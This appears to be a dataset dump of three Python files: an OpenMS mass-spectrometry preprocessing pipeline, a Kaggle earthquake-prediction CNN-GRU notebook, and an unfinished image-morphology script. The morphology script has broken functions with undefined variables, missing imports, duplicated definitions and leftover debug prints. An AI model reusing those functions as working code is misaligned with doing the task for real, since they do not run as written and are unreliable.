combine_settings(parameter_dict):\r\n # keep track of order\r\n parameter_list = []\r\n keys_sorted = sorted([x for x in parameter_dict])\r\n for key in keys_sorted:\r\n parameters = parameter_dict[key] if isinstance(parameter_dict[key], list) else [parameter_dict[key]]\r\n parameter_list.append(parameters)\r\n\r\n # set combinations via cartesian product\r\n combinations = list(itertools.product(*parameter_list))\r\n\r\n # save name and settings in separate dict\r\n counter = 0\r\n single_settings_dict = {}\r\n for i in combinations:\r\n setting = {}\r\n for j in range(len(keys_sorted)):\r\n setting[keys_sorted[j]] = i[j]\r\n\r\n single_settings_dict[str(counter)] = setting\r\n counter += 1\r\n return single_settings_dict\r\n\r\n\r\n# function for calling MSConvert on files in raw_dir\r\ndef convert_to_mzML(raw_dir, out_path, filetype='raw'):\r\n # create list with all files in directory\r\n files_list = os.listdir(raw_dir)\r\n\r\n # subselect all raw files\r\n raw_files_list = [x for x in files_list if ('.' + filetype) in x]\r\n\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n # if output folder already there, check if same files\r\n # if all same end function, else give these to msconvert\r\n else:\r\n files_done = [x.split('.mzML')[0] for x in os.listdir(out_path)]\r\n raw_files_split = [x.split('.' + filetype)[0] for x in raw_files_list]\r\n not_done = [x for x in raw_files_split if not x in files_done]\r\n if len(not_done) == 0:\r\n return\r\n else:\r\n raw_files_list = [x + '.' + filetype for x in not_done]\r\n\r\n raw_files_list = [os.path.join(raw_dir, x) for x in raw_files_list]\r\n # write msconvert input file\r\n input_file_path = os.path.join(out_path, 'file_list.txt')\r\n input_file = open(input_file_path, 'w')\r\n for i in raw_files_list:\r\n input_file.write(\"%s\\n\" % i)\r\n input_file.close()\r\n\r\n # start process and print output\r\n convert = subprocess.Popen([\"msconvert\", '-f', input_file_path, '-o', out_path],\r\n stdout=subprocess.PIPE,\r\n universal_newlines=True)\r\n while True:\r\n line = convert.stdout.readline()\r\n if not line: break\r\n print(line, end='\\r')\r\n\r\n\r\n# wrapper for TOPP command line functions\r\n# functions which are built 'standard' should work\r\n#\r\n# in_path: string - path to folder of step before (with subfolders of diff parameters)\r\n# parameters: dict - name is name of option, after that value for option (numbers are converted to strings)\r\n# out_path: string - path to folder where results should be stored\r\n# algorithm: string - full name of algorithm which should be used\r\n# features_path: string - needed for HighResPrecursorMassCorrector, path where features are stored\r\n# out_type: string - needed for file converter, type for resulting file\r\ndef call_TOPP_tool(in_path, out_path, algorithm, num_threads, features_path='', out_type='.mgf', parameters=''):\r\n if os.path.exists(out_path):\r\n return\r\n else:\r\n os.makedirs(out_path)\r\n # generate input and output lists - return: mzml_files_list, out_files_list\r\n mzml_files_list, out_files_list = generate_in_out_list(mzml_in_path=in_path,\r\n out_path=out_path,\r\n algorithm=algorithm,\r\n out_type=out_type)\r\n # return feature files for single folders (work on this to select specific feature files corresponding to mzml)\r\n if algorithm == 'HighResPrecursorMassCorrector':\r\n featxml_files_list = generate_feature_files_list(features_in_path=features_path,\r\n mzml_files_list=mzml_files_list)\r\n else:\r\n featxml_files_list = ''\r\n\r\n # generate list of commands based on given parameternames and corresponding values\r\n commands_parameters = []\r\n if len(parameters) != 0:\r\n del parameters['Identifier']\r\n for i in range(len(parameters)):\r\n command = [parameters.index[i], str(parameters[i])]\r\n commands_parameters = commands_parameters + command\r\n\r\n for i in range(len(mzml_files_list)):\r\n # generate commands specific for single file\r\n all_commands = generate_commands(algorithm=algorithm, num_threads=num_threads,\r\n mzml_files_list=mzml_files_list,\r\n out_files_list=out_files_list, commands_parameters=commands_parameters,\r\n i=i, featxml_files_list=featxml_files_list)\r\n # call TOPP tool\r\n subprocess_TOPP(all_commands)\r\n\r\n\r\n# generate lists with full paths to single files (in and out respectivly)\r\ndef generate_in_out_list(mzml_in_path, out_path, algorithm, out_type):\r\n files_list = os.listdir(mzml_in_path)\r\n mzml_names_list = [x for x in files_list if '.mzML' in x]\r\n\r\n # generate output list, use different endings for some tools\r\n if algorithm == 'FeatureFinderCentroided':\r\n out_files_list = [os.path.join(out_path, x.replace('.mzML', '.featureXML')) for x in mzml_names_list]\r\n elif algorithm == 'FileConverter':\r\n out_files_list = [os.path.join(out_path, x.replace('.mzML', out_type)) for x in mzml_names_list]\r\n else:\r\n out_files_list = [os.path.join(out_path, x) for x in mzml_names_list]\r\n mzml_files_list = [os.path.join(mzml_in_path, x) for x in mzml_names_list]\r\n\r\n return mzml_files_list, out_files_list\r\n\r\n\r\n# return list of feature files (needed for HighResPrecursorMassCorrector)\r\ndef generate_feature_files_list(features_in_path, mzml_files_list):\r\n feature_list = os.listdir(features_in_path)\r\n featxml_names_list = [x for x in feature_list if '.featureXML' in x]\r\n # match order to mzml\r\n # extract names from mzml_files_list\r\n mzml_names_list = list()\r\n for i in range(len(mzml_files_list)):\r\n name = os.path.split(mzml_files_list[i])[1]\r\n name = name.split('.mzML')[0] + '.featureXML'\r\n mzml_names_list = mzml_names_list + [name]\r\n\r\n # match order of feature files to order of mzml files\r\n featxml_names_list_sorted = list()\r\n for i in mzml_names_list:\r\n match = [x for x in featxml_names_list if i in x]\r\n featxml_names_list_sorted = featxml_names_list_sorted + match\r\n\r\n featxml_files_list = [os.path.join(features_in_path, x) for x in featxml_names_list_sorted]\r\n return featxml_files_list\r\n\r\n\r\n# return list of commands to give to calling of TOPP tool\r\ndef generate_commands(algorithm, num_threads, mzml_files_list, out_files_list, commands_parameters, i,\r\n featxml_files_list):\r\n if algorithm == 'FileConverter':\r\n algorithm = 'C:\\\\Program Files\\\\OpenMS-2.1.0\\\\bin\\\\' + algorithm\r\n commands_general = [algorithm,\r\n '-threads', str(num_threads),\r\n '-in', mzml_files_list[i],\r\n '-out', out_files_list[i]]\r\n else:\r\n commands_general = [algorithm,\r\n '-threads', str(num_threads),\r\n '-in', mzml_files_list[i],\r\n '-out', out_files_list[i]]\r\n\r\n if algorithm == 'HighResPrecursorMassCorrector':\r\n commands_general = commands_general + ['-feature:in', featxml_files_list[i]]\r\n all_commands = commands_general + commands_parameters\r\n\r\n return all_commands\r\n\r\n\r\n# start subprocess for TOPP tool\r\ndef subprocess_TOPP(all_commands):\r\n TOPP_tool = subprocess.Popen(all_commands, stdout=subprocess.PIPE, universal_newlines=True)\r\n # print output of console\r\n while True:\r\n line = TOPP_tool.stdout.readline()\r\n if not line: break\r\n print(line, end='\\r')\r\n\r\n\r\ndef modify_scans(path, identifier, prefix='scan=', OpenMS_prefix=True):\r\n files = os.listdir(path)\r\n for filename in files:\r\n if filename[:2] == 'PP': continue\r\n if OpenMS_prefix:\r\n newfilename = '_'.join(['OpenMS', identifier, '_'.join(filename.split('_')[:2])])\r\n else:\r\n newfilename = '_'.join(['other', identifier, '_'.join(filename.split('_')[:2])])\r\n for line in fileinput.FileInput(os.path.join(path, filename), inplace=True):\r\n if prefix in line:\r\n Scan = line[line.find(prefix) + len(prefix):].split('_')\r\n Scan[1] = newfilename\r\n newline = line[:line.find(prefix)] + prefix + '_'.join(Scan)\r\n print(newline)\r\n else:\r\n print(line, end=\"\")\r\n os.rename(os.path.join(path, filename),\r\n os.path.join(path, newfilename + '.mgf'))\r\n\r\n\r\ndef write_to_ID_table(file_dir, setting, ID_table):\r\n result_dict = {}\r\n # create list with all files in directory\r\n files_list = os.listdir(file_dir)\r\n\r\n files = [x for x in files_list if '.mgf' in x]\r\n\r\n for i in files:\r\n # for j in settings:\r\n result_dict[i + setting] = {'File': i, 'Algorithm': 'OpenMS',\r\n 'Setting': setting, 'ID': ''}\r\n\r\n df_settings = pandas.DataFrame.from_dict(result_dict, orient='index')\r\n df_ID_table = pandas.read_csv(ID_table,\r\n index_col=False, header=0)\r\n\r\n df_merged = pandas.concat([df_settings, df_ID_table])\r\n df_merged = df_merged[['File', 'Algorithm', 'Setting', 'ID']]\r\n df_merged.to_csv(ID_table, index=False)\r\n\r\n\r\ndef move_files(fileconv_path, out_path):\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n\r\n files_list = os.listdir(fileconv_path)\r\n\r\n for single_file in files_list:\r\n os.rename(os.path.join(fileconv_path, single_file),\r\n os.path.join(out_path, single_file))\r\n\r\n\r\ndef peakpickingonly(result_path, raw_dir, mzml_dir, nthreads, Top, Win):\r\n if not os.path.exists(result_path):\r\n os.makedirs(result_path)\r\n param_dict_combined = determine_settings_combos(\r\n algorithms=['SpectraFilter'],\r\n OpenMS_par_dict={'SpectraFilter': {'-algorithm:windowsize': Win,\r\n '-algorithm:peakcount': Top,\r\n '-algorithm:movetype': ['jump']}},\r\n out_path=os.path.join(result_path, 'Settings'))\r\n\r\n convert_to_mzML(raw_dir=raw_dir, out_path=mzml_dir)\r\n for SF_setting in param_dict_combined['SpectraFilter'].iterrows():\r\n call_TOPP_tool(algorithm='SpectraFilterWindowMower',\r\n in_path=mzml_dir,\r\n num_threads=nthreads,\r\n parameters=SF_setting[1],\r\n out_path=os.path.join(result_path, 'SpectraFilter'))\r\n\r\n # FileConverter\r\n call_TOPP_tool(algorithm='FileConverter',\r\n in_path=os.path.join(result_path, 'SpectraFilter'),\r\n num_threads=nthreads,\r\n out_type='.mgf',\r\n out_path=os.path.join(result_path, 'FileConverter'))\r\n\r\n modify_scans(path=os.path.join(result_path, 'FileConverter'),\r\n identifier='PPOnlyWin' + str(Win) + 'Top' + str(Top), OpenMS_prefix=False)\r\n\r\n move_files(fileconv_path=os.path.join(result_path, 'FileConverter'),\r\n out_path=os.path.join(os.path.split(result_path)[0], 'All_prepro_peakfiles',\r\n ('other_' + 'PPOnlyWin' + str(Win) + 'Top' + str(Top))))\r\n\r\n\r\ndef main(result_path, OpenMS_par_dict, raw_dir, mzml_dir, nthreads, keep_res):\r\n if not os.path.exists(result_path):\r\n os.makedirs(result_path)\r\n\r\n # save paths to all node folders\r\n result_folders = {}\r\n for folder in ['PeakPicker', 'FeatureFinder', 'MassCorrector', 'SpectraFilter', 'FileConverter']:\r\n result_folders[folder] = os.path.join(result_path, folder)\r\n if not os.path.exists(os.path.join(result_path, folder)):\r\n os.makedirs(os.path.join(result_path, folder))\r\n\r\n param_dict_combined = determine_settings_combos(\r\n algorithms=['PeakPicker', 'FeatureFinder', 'MassCorrector', 'SpectraFilter'],\r\n OpenMS_par_dict=OpenMS_par_dict,\r\n out_path=os.path.join(result_path, 'Settings'))\r\n\r\n # convert files\r\n convert_to_mzML(raw_dir=raw_dir, out_path=mzml_dir)\r\n\r\n # peakpickerhires\r\n for PP_setting in param_dict_combined['PeakPicker'].iterrows():\r\n PP_folder_ident = 'PP' + str(PP_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='PeakPickerHiRes',\r\n in_path=mzml_dir, num_threads=nthreads,\r\n parameters=PP_setting[1],\r\n out_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident))\r\n\r\n # featurefinderCentroided\r\n for FF_setting in param_dict_combined['FeatureFinder'].iterrows():\r\n FF_folder_ident = PP_folder_ident + '_FF' + str(FF_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='FeatureFinderCentroided',\r\n in_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident),\r\n num_threads=nthreads,\r\n parameters=FF_setting[1],\r\n out_path=os.path.join(result_folders['FeatureFinder'], FF_folder_ident))\r\n\r\n # HighResPrecursorMassCorrector\r\n for MC_setting in param_dict_combined['MassCorrector'].iterrows():\r\n MC_folder_ident = FF_folder_ident + '_MC' + str(MC_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='HighResPrecursorMassCorrector',\r\n in_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident),\r\n num_threads=nthreads,\r\n features_path=os.path.join(result_folders['FeatureFinder'], FF_folder_ident),\r\n parameters=MC_setting[1],\r\n out_path=os.path.join(result_folders['MassCorrector'], MC_folder_ident))\r\n\r\n # SpectralFilterWindowMower\r\n for SF_setting in param_dict_combined['SpectraFilter'].iterrows():\r\n SF_folder_ident = MC_folder_ident + '_SF' + str(SF_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='SpectraFilterWindowMower',\r\n in_path=os.path.join(result_folders['MassCorrector'], MC_folder_ident),\r\n num_threads=nthreads,\r\n parameters=SF_setting[1],\r\n out_path=os.path.join(result_folders['SpectraFilter'], SF_folder_ident))\r\n\r\n # FileConverter\r\n call_TOPP_tool(algorithm='FileConverter',\r\n in_path=os.path.join(result_folders['SpectraFilter'], SF_folder_ident),\r\n num_threads=nthreads,\r\n out_type='.mgf',\r\n out_path=os.path.join(result_folders['FileConverter'], SF_folder_ident))\r\n if os.path.exists(os.path.join(result_folders['FileConverter'], SF_folder_ident)):\r\n modify_scans(path=os.path.join(result_folders['FileConverter'], SF_folder_ident),\r\n identifier=SF_folder_ident)\r\n move_files(fileconv_path=os.path.join(result_folders['FileConverter'], SF_folder_ident),\r\n out_path=os.path.join(os.path.split(result_path)[0], 'All_prepro_peakfiles',\r\n ('OpenMS_' + SF_folder_ident)))\r\n","repo_name":"Rappsilber-Laboratory/Xi-MPA_scripts","sub_path":"OpenMS.py","file_name":"OpenMS.py","file_ext":"py","file_size_in_byte":19194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049471611","text":"\n\n\nfrom os import listdir, makedirs\n\nfrom os.path import isfile, join, basename, splitext, isfile, exists\n\n\n\nimport numpy as np\n\nimport pandas as pd\n\n\n\nfrom tqdm import tqdm_notebook\n\n\n\nimport tensorflow as tf\n\nimport keras.backend as K\n\n\n\nimport keras\n\nfrom keras.models import Sequential, Model\n\nfrom keras.layers import Dropout, Dense, Flatten, BatchNormalization\n\nfrom keras.layers import Convolution1D, ZeroPadding1D, MaxPooling1D, GlobalAveragePooling1D, GlobalMaxPooling1D\n\nfrom keras.layers import Concatenate, Average, Maximum, CuDNNLSTM, CuDNNGRU, Bidirectional, TimeDistributed\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint\n\nfrom keras.engine.input_layer import Input\n\nfrom keras.models import load_model\n\n\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n\n\npd.set_option('precision', 30)\n\nnp.set_printoptions(precision = 30)\n\n\n\nnp.random.seed(7723)\n\ntf.set_random_seed(1090)\n\ntrain_df = pd.read_csv('../input/train.csv', dtype={'acoustic_data': np.int8, 'time_to_failure': np.float32})\ntrain_df.head()\nX_train = train_df.acoustic_data.values\n\ny_train = train_df.time_to_failure.values\nends_mask = np.less(y_train[:-1], y_train[1:])\n\nsegment_ends = np.nonzero(ends_mask)\n\n\n\ntrain_segments = []\n\nstart = 0\n\nfor end in segment_ends[0]:\n\n train_segments.append((start, end))\n\n start = end\n\n \n\nprint(train_segments)\nplt.title('Segment sizes')\n\n_ = plt.bar(np.arange(len(train_segments)), [ s[1] - s[0] for s in train_segments])\nclass EarthQuakeRandom(keras.utils.Sequence):\n\n\n\n def __init__(self, x, y, x_mean, x_std, segments, ts_length, batch_size, steps_per_epoch):\n\n self.x = x\n\n self.y = y\n\n self.segments = segments\n\n self.ts_length = ts_length\n\n self.batch_size = batch_size\n\n self.steps_per_epoch = steps_per_epoch\n\n self.segments_size = np.array([s[1] - s[0] for s in segments])\n\n self.segments_p = self.segments_size / self.segments_size.sum()\n\n self.x_mean = x_mean\n\n self.x_std = x_std\n\n\n\n def get_batch_size(self):\n\n return self.batch_size\n\n\n\n def get_ts_length(self):\n\n return self.ts_length\n\n\n\n def get_segments(self):\n\n return self.segments\n\n\n\n def get_segments_p(self):\n\n return self.segments_p\n\n\n\n def get_segments_size(self):\n\n return self.segments_size\n\n\n\n def __len__(self):\n\n return self.steps_per_epoch\n\n\n\n def __getitem__(self, idx):\n\n segment_index = np.random.choice(range(len(self.segments)), p=self.segments_p)\n\n segment = self.segments[segment_index]\n\n end_indexes = np.random.randint(segment[0] + self.ts_length, segment[1], size=self.batch_size)\n\n\n\n x_batch = np.empty((self.batch_size, self.ts_length))\n\n y_batch = np.empty(self.batch_size, )\n\n\n\n for i, end in enumerate(end_indexes):\n\n x_batch[i, :] = self.x[end - self.ts_length: end]\n\n y_batch[i] = self.y[end - 1]\n\n \n\n x_batch = (x_batch - self.x_mean)/self.x_std\n\n\n\n return np.expand_dims(x_batch, axis=2), y_batch\nt_segments = [train_segments[i] for i in [ 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]]\n\nv_segments = [train_segments[i] for i in [ 0, 1, 2, 3]]\nx_sum = 0.\n\ncount = 0\n\n\n\nfor s in t_segments:\n\n x_sum += X_train[s[0]:s[1]].sum()\n\n count += (s[1] - s[0])\n\n\n\nX_train_mean = x_sum/count\n\n\n\nx2_sum = 0.\n\nfor s in t_segments:\n\n x2_sum += np.power(X_train[s[0]:s[1]] - X_train_mean, 2).sum()\n\n\n\nX_train_std = np.sqrt(x2_sum/count)\n\n\n\nprint(X_train_mean, X_train_std)\ntrain_gen = EarthQuakeRandom(\n\n x = X_train, \n\n y = y_train,\n\n x_mean = X_train_mean, \n\n x_std = X_train_std,\n\n segments = t_segments,\n\n ts_length = 150000,\n\n batch_size = 64,\n\n steps_per_epoch = 400\n\n)\n\n\n\nvalid_gen = EarthQuakeRandom(\n\n x = X_train, \n\n y = y_train,\n\n x_mean = X_train_mean, \n\n x_std = X_train_std,\n\n segments = v_segments,\n\n ts_length = 150000,\n\n batch_size = 64,\n\n steps_per_epoch = 400\n\n)\ndef CnnRnnModel():\n\n i = Input(shape = (150000, 1))\n\n \n\n x = Convolution1D( 8, kernel_size = 10, strides = 10, activation='relu')(i)\n\n x = Convolution1D(16, kernel_size = 10, strides = 10, activation='relu')(x)\n\n x = Convolution1D(16, kernel_size = 10, strides = 10, activation='relu')(x)\n\n x = CuDNNGRU(24, return_sequences = False, return_state = False)(x)\n\n y = Dense(1)(x)\n\n\n\n return Model(inputs = [i], outputs = [y])\nmodel = CnnRnnModel()\n\nmodel.compile(loss='mean_absolute_error', optimizer='adam')\n\nmodel.summary()\nhist = model.fit_generator(\n\n generator = train_gen,\n\n epochs = 50, \n\n verbose = 0, \n\n validation_data = valid_gen,\n\n callbacks = [\n\n EarlyStopping(monitor='val_loss', patience = 5, verbose = 1),\n\n ModelCheckpoint(filepath='cnn_rnn.h5', monitor='val_loss', save_best_only=True, verbose=1)]\n\n)\nplt.plot(hist.history['loss'])\n\nplt.plot(hist.history['val_loss'])\n\nplt.title('Model loss')\n\nplt.ylabel('Loss')\n\nplt.xlabel('Epoch')\n\n_= plt.legend(['Train', 'Test'], loc='upper left')\ndef load_test(ts_length = 150000):\n\n base_dir = '../input/test/'\n\n test_files = [f for f in listdir(base_dir) if isfile(join(base_dir, f))]\n\n\n\n ts = np.empty([len(test_files), ts_length])\n\n ids = []\n\n \n\n i = 0\n\n for f in tqdm_notebook(test_files):\n\n ids.append(splitext(f)[0])\n\n t_df = pd.read_csv(base_dir + f, dtype={\"acoustic_data\": np.int8})\n\n ts[i, :] = t_df['acoustic_data'].values\n\n i = i + 1\n\n\n\n return ts, ids\ntest_data, test_ids = load_test()\nX_test = ((test_data - X_train_mean)/ X_train_std).astype('float32')\n\nX_test = np.expand_dims(X_test, 2)\n\nX_test.shape\nmodel = load_model('cnn_rnn.h5')\ny_pred = model.predict(X_test)\nsubmission_df = pd.DataFrame({'seg_id': test_ids, 'time_to_failure': y_pred[:, 0]})\nsubmission_df.to_csv(\"submission.csv\", index=False)","repo_name":"aorursy/new-nb-1","sub_path":"adubitskiy_rnn-with-cnn-feature-extraction.py","file_name":"adubitskiy_rnn-with-cnn-feature-extraction.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1640490545","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\nimport my\nimport cv2\nimport numpy as np\nimport time as t\nfrom datetime import datetime\nfrom skimage import io, color, morphology\nimport ia870 as ia\nimport skimage\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport queue\ndef close(im, kernel, iterations=1):\n imdil = cv2.erode(im, kernel, iterations)\n result = cv2.dilate(imdil, kernel, iterations)\n return result\n\ndef closeth (im, kernel, iterations=1):\n \n imdil = cv2.dilate(im,kernel,iterations)\n imerod = cv2.erode(imdil,kernel,iterations)\n result = imerod - im\n return result\n\n\ndef openth (im, kernel, iterations=1):\n \n \n imerod = cv2.erode(im,kernel,iterations)\n imdil = cv2.dilate(imerod,kernel,iterations)\n result = imdil - im\n return result\n\ndef rgb2gray(rgb):\n r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]\n gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n return gray\n\ndef blackhat(im, kernel, iterations=1):\n result = close(im, kernel, iterations)\n return result\n\ndef smooth(im, diam=3):\n result = cv2.GaussianBlur(im, (diam, diam), 0)\n return(result)\n\ndef image_equal(im0, im1):\n return (sum(sum(im0 != im1)) == 0)\n\n\ndef infrec (im,aux):\n kernel = np.ones((13,13), np.uint8)\n imero = aux\n c = 0\n imt0 = imero\n imt1 = cv2.dilate(imt0, kernel)\n is_equal = image_equal(imt0, imt1)\n while (not is_equal.all()):\n #print(c)\n imt0 = imt1\n imdil = cv2.erode(imt0, kernel)\n imt1 = np.maximum(imdil, im)\n is_equal = image_equal(imt0, imt1)\n c = c + 1\n return imt1\n\n\ndef iaisequal(f1, f2, MSG=None):\n\n if f1.shape != f2.shape:\n return False\n return numpy.all(f1 == f2)\ndef reconstruct(im):\n kernel = np.ones((11,11), np.uint8)\n imero = cv2.erode(im, kernel)\n c = 0\n imt0 = imero\n imt1 = cv2.dilate(imt0, kernel)\n is_equal = image_equal(imt0, imt1)\n while (not is_equal.all()):\n #print(c)\n imt0 = imt1\n imdil = cv2.dilate(imt0, kernel)\n imt1 = np.minimum(imdil, im)\n is_equal = image_equal(imt0, imt1)\n c = c + 1\n return imt1\n\n\ndef infrec(f1,f2,n=1):\n secross = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n y = np.minimum(f1,f2)\n\n for i in range(n):\n aux = y\n y1 = cv2.dilate(f1,secross)\n y = np.minimum(y1,f2)\n if iaisequal(y,aux): break\n\n return y\n\n \n\n\ndef iaisequal(f1, f2, MSG=None):\n\n if f1.shape != f2.shape:\n return False\n return np.all(f1 == f2)\n \n\n\n\n\ndef blob(f, measurement, output=\"image\"):\n #import numpy\n from numpy import newaxis, ravel, zeros, sum, nonzero, array, asanyarray\n from string import lower\n\n measurement = lower(measurement)\n output = lower(output)\n if len(f.shape) == 1: f = f[newaxis,:]\n assert measurement in ('area', 'centroid', 'boundingbox'), 'pymorph.blob: Unknown measurement type \\'%s\\'' % measurement\n if output == 'data':\n y = []\n elif measurement == 'centroid':\n y = zeros(f.shape,numpy.bool)\n else:\n y = zeros(f.shape,numpy.int32)\n for obj_id in range(f.max()):\n blob = (f == (obj_id+1))\n if measurement == 'area':\n area = blob.sum()\n if output == 'data': y.append(area)\n else : y += area*blob\n elif measurement == 'centroid':\n indy, indx = nonzero(blob)\n cy = sum(indy) // len(indy)\n cx = sum(indx) // len(indx)\n if output == 'data': y.append( (cy, cx) )\n else : y[cy, cx] = 1\n elif measurement == 'boundingbox':\n col, = nonzero(blob.any(0))\n row, = nonzero(blob.any(1))\n if output == 'data': y.append([col[0],row[0],col[-1]+1,row[-1]+1])\n else:\n y[row[0]:row[-1], col[0]] = 1\n y[row[0]:row[-1],col[-1]] = 1\n y[row[0], col[0]:col[-1]] = 1\n y[row[-1],col[0]:col[-1]] = 1\n return asanyarray(y)\n\n\ndef label(f, Bc=None):\n if Bc is None: Bc = secross()\n if not isbinary(f):\n f = (f > 0)\n f = pad4n(f, Bc, 0)\n neighbours = se2flatidx(f,Bc)\n labeled = f * 0\n f = f.ravel()\n labeledflat=labeled.ravel()\n label = 1\n queue = []\n for i in range(f.size):\n if f[i] and labeledflat[i] == 0:\n labeledflat[i]=label\n queue=[i+bi for bi in neighbours]\n while queue:\n ni=queue.pop()\n if f[ni] and labeledflat[ni] == 0:\n labeledflat[ni]=label\n for n in neighbours+ni:\n queue.append(n)\n label += 1\n return labeled[1:-1,1:-1]\n\n\n\ndef binary(f, k=1):\n \n from numpy import asanyarray\n f = asanyarray(f)\n return (f >= k)\n\n\ndef union(f1, f2, *args):\n \n from numpy import maximum\n y = maximum(f1,f2)\n for f in args:\n y = maximum(y,f)\n return y.astype(f1.dtype)\n \ndef secross(r=1):\n \n return sesum(binary([[0,1,0],\n [1,1,1],\n [0,1,0]]),\n r)\n\ndef isbinary(f):\n return f.dtype == bool\n\n\ndef threshad(f, f1, f2=None):\n \n if f2 is None:\n return f1 <= f\n return (f1 <= f) & (f <= f2)\n\n\ndef sesum(B=None, N=1):\n \n if B is None: B = secross()\n if N==0:\n if isbinary(B): return binary([[1]])\n else: return to_int32([[0]]) \n NB = B\n for i in range(N-1):\n NB = sedilate(NB,B)\n return NB\n\n\ndef areaopen(f, a, Bc=None):\n if Bc is None: Bc = secross()\n fr = label(f,Bc) \n g = blob(fr,'area')\n y = threshad(g,a)\n \n for k in range(k1,k2+1):\n fk = threshad(f,k)\n fo = areaopen(fk,a,Bc)\n if isequal(fo,zero):\n break\n y = union(y, gray(fo,datatype(f),k))\n return y\n\ndef pad4n(f, Bc, value, scale=1):\n \n from numpy import ones, array\n\n if type(Bc) is not array:\n Bc = seshow(Bc)\n Bh, Bw = Bc.shape\n assert Bh%2 and Bw%2, 'structuring element must be odd sized'\n ch, cw = scale * Bh/2, scale * Bw/2\n g = value * ones( f.shape + scale * (array(Bc.shape) - 1))\n g[ ch: -ch, cw: -cw] = f\n return g.astype(f.dtype)\n\ndef mat2set(A):\n \n from numpy import take, ravel, nonzero, transpose, newaxis\n\n if len(A.shape) == 1: A = A[newaxis,:]\n offsets = nonzero(ravel(A) - limits(A)[0])[0]\n if len(offsets) == 0: return ([],[])\n h,w = A.shape\n x = [0,1]\n x[0] = offsets//w - (h-1)//2\n x[1] = offsets%w - (w-1)//2\n x = transpose(x)\n return x,take(ravel(A),offsets)\n\ndef find_area(area, i):\n lista = []\n while area[i] >= 0:\n lista.append(i)\n i = area[i]\n area[lista] = i\n return i\ndef iasecross(r=1):\n from ia870.iasesum import iasesum\n from ia870.iabinary import iabinary\n\n B = iasesum( iabinary([[0,1,0],\n [1,1,1],\n [0,1,0]]),r)\n return B\n\n\ndef iase2off(Bc,option='neigh'):\n \n '''Converts structuring element to list of neighbor offsets in graph image'''\n print(\"TAMANHO BC\",len(Bc.shape))\n if len(Bc.shape) == 2:\n h,w = Bc.shape\n hc,wc = h//2,w//2\n B = Bc.copy()\n B[hc,wc] = 0 # remove origin\n off = np.transpose(B.nonzero()) - np.array([hc,wc])\n if option == 'neigh':\n return off # 2 columns x n. of neighbors rows\n elif option == 'fw':\n i = off[:,0] * w + off[:,1]\n return off[i>0,:] # only neighbors higher than origin in raster order\n elif option == 'bw':\n i = off[:,0] * w + off[:,1]\n return off[i<0,:] # only neighbors less than origin in raster order\n else:\n assert 0,'options are neigh, fw or bw. It was %s'% option\n return None\n elif len(Bc.shape) == 3:\n d,h,w = Bc.shape\n dc,hc,wc = d//2,h//2,w//2\n B = Bc.copy()\n B[dc,hc,wc] = 0 # remove origin\n off = np.transpose(B.nonzero()) - np.array([dc,hc,wc])\n if option == 'neigh':\n return off # 2 columns x n. of neighbors rows\n elif option == 'fw':\n i = off[:,0] * h*w + off[:,1] * w + off[:,2]\n return off[i>0,:] # only neighbors higher than origin in raster order\n elif option == 'bw':\n i = off[:,0] * h*w + off[:,1] * w + off[:,2]\n return off[i<0,:] # only neighbors less than origin in raster order\n else:\n assert 0,'options are neigh, fw or bw. It was %s'% option\n return None\n else:\n print('2d or 3d only. Shape was', len(Bc.shape))\n return None\n\ndef iaNlut(s,offset):\n '''Precompute array of neighbors. Optimized by broadcast.\n s - image shape\n offset - offset matrix, 2 columns (dh,dw) by n. of neighbors rows\n '''\n print(\"TAMANHO IANLUT\",len(s))\n if len(s)== 2:\n H,W = s\n n = H*W\n hi = np.arange(H).reshape(-1,1)\n wi = np.arange(W).reshape(1,-1)\n hoff = offset[:,0]\n woff = offset[:,1]\n h = hi + hoff.reshape(-1,1,1)\n w = wi + woff.reshape(-1,1,1)\n h[(h<0) | (h>=H)] = n\n w[(w<0) | (w>=W)] = n\n Nlut = np.clip(h * W + w,0,n)\n return Nlut.reshape(offset.shape[0],-1).transpose()\n elif len(s)== 3:\n D,H,W = s\n n = D*H*W\n di = np.arange(D).reshape(-1, 1, 1)\n hi = np.arange(H).reshape( 1,-1, 1)\n wi = np.arange(W).reshape( 1, 1,-1)\n doff = offset[:,0]\n hoff = offset[:,1]\n woff = offset[:,2]\n d = di + doff.reshape(-1,1,1,1)\n h = hi + hoff.reshape(-1,1,1,1)\n w = wi + woff.reshape(-1,1,1,1)\n d[(d<0) | (d>=D)] = n\n h[(h<0) | (h>=H)] = n\n w[(w<0) | (w>=W)] = n\n Nlut = np.clip(d * H*W + h * W + w,0,n)\n return Nlut.reshape(offset.shape[0],-1).transpose()\n else:\n print('s must have 2 or 3 dimensions')\n return None\n\n\ndef iaareaopen(f,a,Bc=iasecross()):\n np.set_printoptions(threshold=np.inf)\n a = -a\n #print(a)\n s = f.shape\n print(len(f))\n print(\"Shape =\",s)\n g = np.zeros_like(f).ravel()\n print(\"Zeros=\",g)\n print(\"NUMEROS DE ZEROS=\",len(g))\n \n print(\"RAVEl=\",f.ravel())\n print(\"NUMEROS DE RAVEL=\",len(f.ravel()))\n f1 = np.concatenate((f.ravel(),np.array([0])))\n #f1 = np.array(np.zeros(17915904))\n print(\"F1 =\",f1)\n print(\"NUMEROS F1=\",len(f1))\n print(\"Area Img =\",f1.size)\n if (f1 == f+1):\n print(\"DKASIJDSAIO\")\n else:\n print(\"NEGATIVO\")\n area = 